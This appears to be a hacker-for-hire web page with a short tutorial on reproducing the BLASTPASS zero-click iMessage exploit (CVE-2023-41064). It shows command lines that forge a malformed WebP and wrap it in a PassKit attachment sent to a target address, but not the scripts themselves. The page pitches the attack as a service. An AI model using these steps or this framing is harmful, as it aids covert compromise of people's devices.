[~]mobilehackerforhire$ hire --now
    cd ../tutorials
    root@mhfh:~#less posts/cve-2023-41064.md
    posts/cve-2023-41064.md
    CVE-2023-41064· 31 min · mhfh research · 2023-09-15

    Reproducing BLASTPASS: 0-click iMessage Implant

    Reverse engineering Apple's ImageIO PassKit attachment chain. We rebuild a malformed WebP that bypasses BlastDoor and lands code execution.

    #iOS#0-click#iMessage#ImageIO
    $cat snippet.sh
    python3 forge_webp.py --huff-overflow 0x4141 --out blast.webp
python3 wrap_pkpass.py --payload blast.webp --recipient target@icloud

    Overview

    BLASTPASS (CVE-2023-41064) is a 0-click chain delivered through a PassKit attachment in iMessage. The bug lives in ImageIO's WebP decoder.

    Forging the WebP

    $cat snippet.sh
    python3 forge_webp.py --huff-overflow 0x4141 --out blast.webp

    The crafted VP8L Huffman table overflows a heap buffer in libwebp's HuffmanTreeBuildExplicit.

    Wrapping in a PassKit attachment

    $cat snippet.sh
    python3 wrap_pkpass.py --payload blast.webp --recipient target@icloud

    Why BlastDoor doesn't help

    PassKit attachments are processed outside the BlastDoor sandbox, giving us direct access to ImageIO in a privileged context.

    Mitigation

    iOS 16.6.1 + Lockdown Mode.